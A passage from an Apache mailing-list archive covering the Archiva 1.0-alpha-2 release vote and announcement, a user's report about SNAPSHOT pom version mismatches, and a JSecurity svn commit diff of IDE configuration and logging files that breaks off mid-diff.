In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Scanned: ClamAV using ClamSMTP X-Virus-Checked: Checked by ClamAV on apache.org +1 (from San Jose, CA) - Joakim Wendy Smoak wrote: > Archiva 1.0-alpha-2 was tagged and built on Saturday. The proposed > files, including source and binary distributions, checksums, and > signatures, can be found here: > > http://people.apache.org/builds/maven/archiva/1.0-alpha-2/ > > This release resolves several issues with proxying artifacts, and > modifying the configuration through the web UI. The list of issues > identified and closed with this release can be found below: > > Archiva 1.0-alpha-2 Release Notes: > > http://jira.codehaus.org/secure/ReleaseNote.jspa?version=13518&styleName=Text&projectId=10980&Create=Create > > > (There were 16 issues still marked fix-for this version, which I moved > to 1.0.x in JIRA.) > > Once you have had a chance to examine the distribution, please cast > your vote. We welcome votes and feedback from all community members. > > [ ] +1 Release it! > [ ] 0 > [ ] -1 Don't release it, because... > > 72 hours ends Wednesday afternoon (GMT -7), but I probably won't have > time to do anything else with it until Friday. > > -- > Wendy > From [email protected] Mon Jun 25 19:52:21 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 47786 invoked from network); 25 Jun 2007 19:52:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Jun 2007 19:52:19 -0000 Received: (qmail 96526 invoked by uid 500); 25 Jun 2007 19:52:22 -0000 Delivered-To: [email protected] Received: (qmail 96493 invoked by uid 500); 25 Jun 2007 19:52:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 96484 invoked by uid 99); 25 Jun 2007 19:52:22 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 25 Jun 2007 12:52:22 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO dhsmnnt3.dhsnet.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 25 Jun 2007 12:52:17 -0700 X-MimeOLE: Produced By Microsoft Exchange V6.0.6487.1 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C7B762.48C908A9" Subject: maven-metadata.xml: <version> contains incorrect value? Date: Mon, 25 Jun 2007 14:51:55 -0500 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: maven-metadata.xml: <version> contains incorrect value? Thread-Index: Ace3YkfKy/z5JhL/R0yGnDzT/bIdAQ== From: "Troy Ronning" <[email protected]> To: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------_=_NextPart_001_01C7B762.48C908A9 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Hey Everyone! Our development team has been having some issues with certain SNAPSHOTs deployed to Archiva being invalid. Meaning, the artifact page doesn't display or the *.jar is not available for download (if using Archiva version previous to 1.0-alpha-2). I haven't been able to figure what was causing it out until now. The SNAPSHOT poms seem to have an 'invalid' <version>? =20 =20 Example: 'persistence-lib-1.0-20070523.040036-2.pom' has a <version> of 1.0-SNAPSHOT. This produces the error further below. I believe the version is not being set correctly during deploy but am unsure of why. If I manually change the version and re-index in Archiva, all seems to be well. =20 =20 Is this an Archiva issue or Maven deploy issue? Seems to me that's it's a maven issue. Could the combination of 'deploy | site-deploy' be part of it? The problem is, the results are not consistent enough for me to find a pattern yet. _sigh_ =20 Any thoughts or direction on this would be appreciated. =20 =20 =20 <<<<<<<< The Environment: >>>>>>>>>> apache-archiva-1.0-alpha-2 maven-2.0.6 cruisecontrol-bin-2.6.1 config.xml snippet: <maven2 ... goal=3D"clean = | scm:update | deploy | site-deploy" ... /> <!-- Runs nightly --> =20 =20 =20 <<<<<<<< Begin ERROR >>>>>>>>>>>>> | 2007-06-25 13:24:16,371 [SocketListener0-0] DEBUG org.apache.maven.archiva.repository.project.ProjectModelFilter:effective - Starting build of effective with: groupId =3D 'com.dhsnet.persistence' | artifactId =3D 'persistence-lib' | version =3D '1.0-SNAPSHOT' | 2007-06-25 13:24:16,371 [SocketListener0-0] DEBUG org.apache.maven.archiva.repository.project.ProjectModelFilter:effective - Parent: org.apache.maven.archiva.model.VersionedReference@74645b | 2007-06-25 13:24:16,371 [SocketListener0-0] DEBUG org.apache.maven.archiva.repository.project.ProjectModelFilter:effective - Has parent: org.apache.maven.archiva.model.VersionedReference@74645b | 2007-06-25 13:24:16,418 [SocketListener0-0] DEBUG org.apache.maven.archiva.repository.project.ProjectModelFilter:effective - Parent: null | 2007-06-25 13:24:16,418 [SocketListener0-0] DEBUG org.apache.maven.archiva.repository.project.ProjectModelFilter:effective - No parent found | 2007-06-25 13:24:16,418 [SocketListener0-0] DEBUG org.apache.maven.archiva.repository.project.ProjectModelFilter:effective - Mix in Super POM: groupId =3D 'com.dhsnet' | artifactId =3D 'dhs-common' | version =3D '1.0' | 2007-06-25 13:24:16,418 [SocketListener0-0] WARN org.apache.maven.archiva.consumers.DatabaseUnprocessedArtifactConsumer:u pdate-db-project - Project Model groupId =3D 'com.dhsnet.persistence' | artifactId =3D 'persistence-lib' | version =3D '1.0-SNAPSHOT' version: 1.0-SNAPSHOT does not match the = pom file's version: 1.0-20070523.040036-2 | 2007-06-25 13:24:16,886 [SocketListener0-0] WARN org.apache.maven.archiva.consumers.DatabaseUnprocessedArtifactConsumer:u pdate-db-project - Invalid or corrupt pom. Project model groupId =3D 'com.dhsnet.persistence' | artifactId =3D 'persistence-lib' | version =3D '1.0-SNAPSHOT' was not added in the database. <<<<<<<<<< End ERROR >>>>>>>>>>>>>>>> =20 =20 Troy Ronning Research & Development Source Control Administrator Dairyland Healthcare Solutions Phone: 8062796280 Fax: 8062796280 [email protected] <mailto:[email protected]>=20 =20 This information is confidential and is for the use of the intended recipient only. Any improper use of this information is strictly prohibited. If you have received this email in error, please reply to the sender immediately and delete this communication. =20 ------_=_NextPart_001_01C7B762.48C908A9-- From [email protected] Mon Jun 25 21:58:57 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 92050 invoked from network); 25 Jun 2007 21:58:55 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Jun 2007 21:58:55 -0000 Received: (qmail 28904 invoked by uid 500); 25 Jun 2007 21:58:58 -0000 Delivered-To: [email protected] Received: (qmail 28874 invoked by uid 500); 25 Jun 2007 21:58:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 28865 invoked by uid 99); 25 Jun 2007 21:58:58 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 25 Jun 2007 14:58:58 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nz-out-0506.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 25 Jun 2007 14:58:54 -0700 Received: by nz-out-0506.google.com with SMTP id q3so1380420nzb for <[email protected]>; Mon, 25 Jun 2007 14:58:33 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=Ce6l96BAO045oa0nDCnx/NDx07RvrYDS6uK0izLg7drZQnz5CzL6PvnxQJqlYGIPFRe2ihi0hLT+TAVO1mUH53DpoYiUlfZIEUI9n5vZg5wocD1CJqLLXAj41wEFP9D+Vv2DYSjJPwwn+N3LPy1ajgVAcIKa0SOcvGdtUtr63fg= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=Q+Jo62PwD4UpEsc9TS2KowY+DDdnLr+LzqRoQujUbmNjyuJU/32pMFO3FD80VK8zReevPo+9df2exwtvBM8T6c5Esn4zfmaUWShaWU76pynLiz8H4rXe5xywlQ5bBIyu90beGg2KR1EESnasWJ6yYI4iN4ovcYjuI9Zb2sdXr6w= Received: by 161.129.204.104 with SMTP id f1mr338116wfc.1182808713441; Mon, 25 Jun 2007 14:58:33 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Mon, 25 Jun 2007 14:58:33 -0700 (PDT) Message-ID: <[email protected]> Date: Mon, 25 Jun 2007 16:58:33 -0500 From: "Jesse McConnell" <[email protected]> To: [email protected] Subject: Re: [VOTE] Release Archiva 1.0-alpha-2 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org +1 On 6/25/07, Joakim Erdfelt <[email protected]> wrote: > +1 (from San Jose, CA) > > - Joakim > > Wendy Smoak wrote: > > Archiva 1.0-alpha-2 was tagged and built on Saturday. The proposed > > files, including source and binary distributions, checksums, and > > signatures, can be found here: > > > > http://people.apache.org/builds/maven/archiva/1.0-alpha-2/ > > > > This release resolves several issues with proxying artifacts, and > > modifying the configuration through the web UI. The list of issues > > identified and closed with this release can be found below: > > > > Archiva 1.0-alpha-2 Release Notes: > > > > http://jira.codehaus.org/secure/ReleaseNote.jspa?version=13518&styleName=Text&projectId=10980&Create=Create > > > > > > (There were 16 issues still marked fix-for this version, which I moved > > to 1.0.x in JIRA.) > > > > Once you have had a chance to examine the distribution, please cast > > your vote. We welcome votes and feedback from all community members. > > > > [ ] +1 Release it! > > [ ] 0 > > [ ] -1 Don't release it, because... > > > > 72 hours ends Wednesday afternoon (GMT -7), but I probably won't have > > time to do anything else with it until Friday. > > > > -- > > Wendy > > > > -- jesse mcconnell [email protected] From [email protected] Tue Jun 26 08:51:27 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 19952 invoked from network); 26 Jun 2007 08:51:25 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Jun 2007 08:51:25 -0000 Received: (qmail 71215 invoked by uid 500); 26 Jun 2007 08:51:29 -0000 Delivered-To: [email protected] Received: (qmail 71166 invoked by uid 500); 26 Jun 2007 08:51:28 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 71157 invoked by uid 99); 26 Jun 2007 08:51:28 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 26 Jun 2007 01:51:28 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wr-out-0506.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 26 Jun 2007 01:51:24 -0700 Received: by wr-out-0506.google.com with SMTP id 57so1220111wri for <[email protected]>; Tue, 26 Jun 2007 01:51:03 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=jPPpgR8B2kN+vQ/SSxJqvm/VSP/1eN3LACkpDxnJUB7OrItuXot23rQpwLk1PkN1KR01UPqB8P4CjmcMbHWcqIbf9SWf6mtsWYK4+7el235086rnCk4rZ/wVStUKJ3zjmev2hiEX6Hdd/AE2Nb+LIKIPn9x6YhutXI9lHLXJgU4= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=RdIx42bLFRAQeeEBr26qbTkY9s2c1icdiJr313YmcN8G1tDYGIG9bAQYIgWbTT8qyJPZMjOIShE7WvjDGZ2xHN+bBElMF30r7C4rvRgUHFTOZH+S4USoRa2R2mXw/3+IpkclD/LIG1u7aYRgdyFA54KVi5JjQ4luGGWSapPAs2s= Received: by 161.129.204.104 with SMTP id t11mr2965001hud.1182847862596; Tue, 26 Jun 2007 01:51:02 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 26 Jun 2007 01:51:02 -0700 (PDT) Message-ID: <[email protected]> Date: Tue, 26 Jun 2007 16:51:02 +0800 From: "John Tolentino" <[email protected]> To: [email protected] Subject: Re: [VOTE] Release Archiva 1.0-alpha-2 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org +1 :) On 6/26/07, Jesse McConnell <[email protected]> wrote: > +1 > > On 6/25/07, Joakim Erdfelt <[email protected]> wrote: > > +1 (from San Jose, CA) > > > > - Joakim > > > > Wendy Smoak wrote: > > > Archiva 1.0-alpha-2 was tagged and built on Saturday. The proposed > > > files, including source and binary distributions, checksums, and > > > signatures, can be found here: > > > > > > http://people.apache.org/builds/maven/archiva/1.0-alpha-2/ > > > > > > This release resolves several issues with proxying artifacts, and > > > modifying the configuration through the web UI. The list of issues > > > identified and closed with this release can be found below: > > > > > > Archiva 1.0-alpha-2 Release Notes: > > > > > > http://jira.codehaus.org/secure/ReleaseNote.jspa?version=13518&styleName=Text&projectId=10980&Create=Create > > > > > > > > > (There were 16 issues still marked fix-for this version, which I moved > > > to 1.0.x in JIRA.) > > > > > > Once you have had a chance to examine the distribution, please cast > > > your vote. We welcome votes and feedback from all community members. > > > > > > [ ] +1 Release it! > > > [ ] 0 > > > [ ] -1 Don't release it, because... > > > > > > 72 hours ends Wednesday afternoon (GMT -7), but I probably won't have > > > time to do anything else with it until Friday. > > > > > > -- > > > Wendy > > > > > > > > > > -- > jesse mcconnell > [email protected] > From [email protected] Sat Jun 30 00:48:12 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 14329 invoked from network); 30 Jun 2007 00:48:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Jun 2007 00:48:11 -0000 Received: (qmail 26427 invoked by uid 500); 30 Jun 2007 00:48:13 -0000 Delivered-To: [email protected] Received: (qmail 26399 invoked by uid 500); 30 Jun 2007 00:48:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 26390 invoked by uid 99); 30 Jun 2007 00:48:13 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 29 Jun 2007 17:48:13 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wr-out-0506.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 29 Jun 2007 17:48:09 -0700 Received: by wr-out-0506.google.com with SMTP id 58so598231wri for <[email protected]>; Fri, 29 Jun 2007 17:47:49 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=DtHPKj5K/xuwuDX633aOyMw/Q3x8Ttg0aNBRYL1MqZi7SCyhRy2rVb3URaQAgdVx7D17OBrTrONC0Z8r2euFj9/B5PkmRvOjYF0pcZPVmbs551RJpvNvjDLalNQ0ZwlsVdt0oA5de6kVh/KPraOx64i6fo/rCQn2kAt95Watc3w= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=EJZv4qqw/VFro+EiidkQbWbDof1ZjbJwbkrJ8RMUS/hf3vV3eHDiuv/foUQc3mpBQRboPST7iilj2spJ+iSE5q1bLh7uJoR7YhPbCd5d3prIj/7mqVYCHrNHI+dBRA1MyPg+K6OuV8jUW3qwLGF+QRDPjUgA6cTm1bYHz6uJ4hQ= Received: by 161.129.204.104 with SMTP id e5mr3918134aga.1183164468952; Fri, 29 Jun 2007 17:47:48 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Fri, 29 Jun 2007 17:47:48 -0700 (PDT) Message-ID: <[email protected]> Date: Fri, 29 Jun 2007 17:47:48 -0700 From: "Wendy Smoak" <[email protected]> To: "Archiva Developers List" <[email protected]> Subject: Re: [VOTE] Release Archiva 1.0-alpha-2 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org On 6/24/07, Wendy Smoak <[email protected]> wrote: > Archiva 1.0-alpha-2 was tagged and built on Saturday. The proposed > files, including source and binary distributions, checksums, and > signatures, can be found here: > > http://people.apache.org/builds/maven/archiva/1.0-alpha-2/ The vote has passed with 6 binding +1's from PMC members: Carlos, Wendy, Emmanuel, Joakim, Jesse, John T. 2 non-binding +1's from committers: Deng, Fabrice I'll get the distribution mirrored and send an announcement to (at least) dev@. Thanks, -- Wendy From [email protected] Sat Jun 30 05:14:26 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 92538 invoked from network); 30 Jun 2007 05:14:24 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Jun 2007 05:14:24 -0000 Received: (qmail 8866 invoked by uid 500); 30 Jun 2007 05:14:27 -0000 Delivered-To: [email protected] Received: (qmail 8820 invoked by uid 500); 30 Jun 2007 05:14:27 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 8811 invoked by uid 99); 30 Jun 2007 05:14:27 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 29 Jun 2007 22:14:27 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wx-out-0506.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 29 Jun 2007 22:14:23 -0700 Received: by wx-out-0506.google.com with SMTP id h28so333751wxd for <[email protected]>; Fri, 29 Jun 2007 22:14:03 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=MBchNp8PdlNQaYQXHgmJkPEMD1t1gljTS63iBOh6sFAcgQRPgMwhtEvpOzty4rb6GrLoTEdYGU8JT4FnfEqK/BtMaBA/ghi3VhvIvT65PDJSwnB/5ttNyL8mLvsfDLU9LxPEK1acMClNms+4Ms7cSOivXpGcf7BkcvHk1fzMrdw= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=ePDWIBTXHABVqyX5H/6nO4grQlfyxstLv/Dr6t4t6h+DBAcNn9ZWRU9JWIc0U6taZD9V2J7gi9Nr376rzzsfnuCvs7YUfpZ4Vgw0+1ITQT7b6ki5tf4lz9/IN66yjSeNNv9ptpIOs9egEPYhIkU4NDE8qDieigY9DFxHtuFJqzM= Received: by 161.129.204.104 with SMTP id g14mr3954899agb.1183180442973; Fri, 29 Jun 2007 22:14:02 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Fri, 29 Jun 2007 22:14:02 -0700 (PDT) Message-ID: <[email protected]> Date: Fri, 29 Jun 2007 22:14:02 -0700 From: "Wendy Smoak" <[email protected]> To: "Archiva Developers List" <[email protected]> Subject: [ANNOUNCE] Archiva 1.0 Alpha 2 Release MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline X-Virus-Checked: Checked by ClamAV on apache.org The Maven Archiva team is pleased to announce the availability of Archiva 1.0 Alpha 2. This release resolves issues with proxying, configuration screens, and viewing repository contents with Internet Explorer. The release distribution, including checksums and signatures, can be downloaded from: http://maven.apache.org/archiva/download.html Enjoy! -- Wendy
From [email protected] Sun Dec 28 19:52:03 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 67627 invoked from network); 28 Dec 2008 19:52:03 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Dec 2008 19:52:03 -0000 Received: (qmail 25437 invoked by uid 500); 28 Dec 2008 19:52:03 -0000 Delivered-To: [email protected] Received: (qmail 25425 invoked by uid 500); 28 Dec 2008 19:52:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jsecurity-commits.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 25414 invoked by uid 99); 28 Dec 2008 19:52:03 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 28 Dec 2008 11:52:03 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 28 Dec 2008 19:52:02 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 981A523888E6; Sun, 28 Dec 2008 11:51:42 -0800 (PST) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r729768 - in /incubator/jsecurity/trunk: ./ samples/quickstart/ samples/standalone/ test/ test/org/jsecurity/web/ test/org/jsecurity/web/servlet/ Date: Sun, 28 Dec 2008 19:51:42 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: lhazlewood Date: Sun Dec 28 11:51:41 2008 New Revision: 729768 URL: http://svn.apache.org/viewvc?rev=729768&view=rev Log: JSEC-33 - added two test cases to verify the issue is resolved Modified: incubator/jsecurity/trunk/jsecurity.iml incubator/jsecurity/trunk/jsecurity.ipr incubator/jsecurity/trunk/samples/quickstart/quickstart.iml incubator/jsecurity/trunk/samples/standalone/standalone.iml incubator/jsecurity/trunk/test/log4j.properties incubator/jsecurity/trunk/test/org/jsecurity/web/DefaultWebSecurityManagerTest.java incubator/jsecurity/trunk/test/org/jsecurity/web/servlet/JSecurityFilterTest.java Modified: incubator/jsecurity/trunk/jsecurity.iml URL: http://svn.apache.org/viewvc/incubator/jsecurity/trunk/jsecurity.iml?rev=729768&r1=729767&r2=729768&view=diff ============================================================================== --- incubator/jsecurity/trunk/jsecurity.iml (original) +++ incubator/jsecurity/trunk/jsecurity.iml Sun Dec 28 11:51:41 2008 @@ -9,11 +9,6 @@ <file>file://$MODULE_DIR$/samples/spring/webroot/WEB-INF/sample-servlet.xml</file> <file>file://$MODULE_DIR$/samples/spring/webroot/WEB-INF/remoting-servlet.xml</file> </fileset> - <options> - <option name="enableValidation" value="true" /> - <option name="reportErrorsAsWarnings" value="true" /> - </options> - <customNs /> </configuration> </facet> <facet type="web" name="jsecurity-web"> @@ -32,11 +27,7 @@ <setting name="EXPLODED_ENABLED" value="true" /> <setting name="JAR_URL" value="file://$MODULE_DIR$/out/Quickstart Webapp.war" /> <setting name="JAR_ENABLED" value="false" /> - <setting name="BUILD_MODULE_ON_FRAME_DEACTIVATION" value="false" /> - <setting name="BUILD_EXTERNAL_DEPENDENCIES" value="false" /> <setting name="EXCLUDE_EXPLODED_DIRECTORY" value="true" /> - <setting name="RUN_JASPER_VALIDATION" value="true" /> - <setting name="BUILD_ONLY_WEB_RESOURCES" value="false" /> </building> <packaging> <containerElement type="module" name="jsecurity"> @@ -89,7 +80,6 @@ </library> </orderEntry> <orderEntry type="library" name="quickstart-libs" level="project" /> - <orderEntryProperties /> </component> <component name="copyright"> <Base> Modified: incubator/jsecurity/trunk/jsecurity.ipr URL: http://svn.apache.org/viewvc/incubator/jsecurity/trunk/jsecurity.ipr?rev=729768&r1=729767&r2=729768&view=diff ============================================================================== --- incubator/jsecurity/trunk/jsecurity.ipr (original) +++ incubator/jsecurity/trunk/jsecurity.ipr Sun Dec 28 11:51:41 2008 @@ -7,6 +7,7 @@ <antReference projectDefault="true" /> <customJdkName value="" /> <maximumHeapSize value="128" /> + <maximumStackSize value="32" /> <properties /> </buildFile> </component> @@ -60,6 +61,7 @@ <option name="ADDITIONAL_OPTIONS_STRING" value="" /> <option name="MAXIMUM_HEAP_SIZE" value="128" /> </component> + <component name="Encoding" useUTFGuessing="true" native2AsciiForPropertiesFiles="false" /> <component name="EntryPointsManager"> <entry_points version="2.0" /> </component> @@ -275,6 +277,9 @@ </item> </group> </component> + <component name="ProjectDetails"> + <option name="projectName" value="jsecurity" /> + </component> <component name="ProjectFileVersion" converted="true" /> <component name="ProjectModuleManager"> <modules> @@ -283,7 +288,7 @@ <module fileurl="file://$PROJECT_DIR$/samples/standalone/standalone.iml" filepath="$PROJECT_DIR$/samples/standalone/standalone.iml" /> </modules> </component> - <component name="ProjectRootManager" version="2" assert-keyword="true" jdk-15="true" project-jdk-name="1.5" project-jdk-type="JavaSDK"> + <component name="ProjectRootManager" version="2" languageLevel="JDK_1_5" assert-keyword="true" jdk-15="true" project-jdk-name="1.5" project-jdk-type="JavaSDK"> <output url="file://$PROJECT_DIR$/build/idea" /> </component> <component name="ResourceManagerContainer"> @@ -318,7 +323,7 @@ </entry> </map> </option> - <option name="myVersion" value="123" /> + <option name="myVersion" value="124" /> </component> <component name="VcsDirectoryMappings"> <mapping directory="" vcs="svn" /> Modified: incubator/jsecurity/trunk/samples/quickstart/quickstart.iml URL: http://svn.apache.org/viewvc/incubator/jsecurity/trunk/samples/quickstart/quickstart.iml?rev=729768&r1=729767&r2=729768&view=diff ============================================================================== --- incubator/jsecurity/trunk/samples/quickstart/quickstart.iml (original) +++ incubator/jsecurity/trunk/samples/quickstart/quickstart.iml Sun Dec 28 11:51:41 2008 @@ -9,7 +9,6 @@ <orderEntry type="sourceFolder" forTests="false" /> <orderEntry type="module" module-name="jsecurity" /> <orderEntry type="library" name="quickstart-libs" level="project" /> - <orderEntryProperties /> </component> <component name="copyright"> <Base> Modified: incubator/jsecurity/trunk/samples/standalone/standalone.iml URL: http://svn.apache.org/viewvc/incubator/jsecurity/trunk/samples/standalone/standalone.iml?rev=729768&r1=729767&r2=729768&view=diff ============================================================================== --- incubator/jsecurity/trunk/samples/standalone/standalone.iml (original) +++ incubator/jsecurity/trunk/samples/standalone/standalone.iml Sun Dec 28 11:51:41 2008 @@ -8,7 +8,6 @@ <orderEntry type="inheritedJdk" /> <orderEntry type="sourceFolder" forTests="false" /> <orderEntry type="module" module-name="jsecurity" /> - <orderEntryProperties /> </component> <component name="copyright"> <Base> Modified: incubator/jsecurity/trunk/test/log4j.properties URL: http://svn.apache.org/viewvc/incubator/jsecurity/trunk/test/log4j.properties?rev=729768&r1=729767&r2=729768&view=diff ============================================================================== --- incubator/jsecurity/trunk/test/log4j.properties (original) +++ incubator/jsecurity/trunk/test/log4j.properties Sun Dec 28 11:51:41 2008 @@ -32,4 +32,6 @@ # General Apache libraries is WARN log4j.logger.org.apache=WARN -log4j.logger.net.sf.ehcache=WARN \ No newline at end of file +log4j.logger.net.sf.ehcache=WARN + +log4j.logger.org.jsecurity.util.ThreadContext=WARN \ No newline at end of file Modified: incubator/jsecurity/trunk/test/org/jsecurity/web/DefaultWebSecurityManagerTest.java URL: http://svn.apache.org/viewvc/incubator/jsecurity/trunk/test/org/jsecurity/web/DefaultWebSecurityManagerTest.java?rev=729768&r1=729767&r2=729768&view=diff ============================================================================== --- incubator/jsecurity/trunk/test/org/jsecurity/web/DefaultWebSecurityManagerTest.java (original) +++ 